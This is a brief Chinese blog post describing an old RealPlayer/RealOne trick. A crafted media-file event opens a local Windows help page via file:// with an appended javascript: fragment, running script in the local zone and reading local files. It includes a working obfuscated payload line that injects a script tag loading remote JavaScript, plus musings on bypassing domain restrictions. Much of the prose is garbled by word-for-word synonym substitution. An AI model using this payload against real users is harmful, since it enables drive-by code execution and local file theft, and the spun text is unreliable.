好久以前就有这个对象,其时都是用来挂马的,不外突然想起来,假如能跳到javascript:这样的名目在当地执行js代码意义照旧有点的吧,于是测试了下.功效很让人沮丧,realplay对这个好象倒是有限制,并且查察被插入的rm文件里看出应该是自己就做了限制,看来支持的协议不多啊....于是试试file:///,功效发明是支持的,于是想到前段时间的html injection,假如加起来应该有点结果.
复制代码 代码如下:
u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/
这段代码插进去会呈现一个诡异的毗连,点击下会执行我指定的js(微软的工程师照旧很小心的,临时正常环境下找到的html就这一个,并且还要点......),并且事实证明简直是当地区执行的,可以读当地的文件,呵呵......并且在realone播放的环境下,ie谁人当地执行js代码的告诫居然会神奇地消失,于是放到html页面播放,公然很郁闷,打开任何html城市告诫,不外照旧神奇地能打开当地区的文件.....正常下用window.open是不行以的.....域的限制是可以打破,但愿能找到个当地存在问题的html就OK啦,呵呵.......
真但愿这些边沿的处所能出点问题,我感受照旧大概的 :)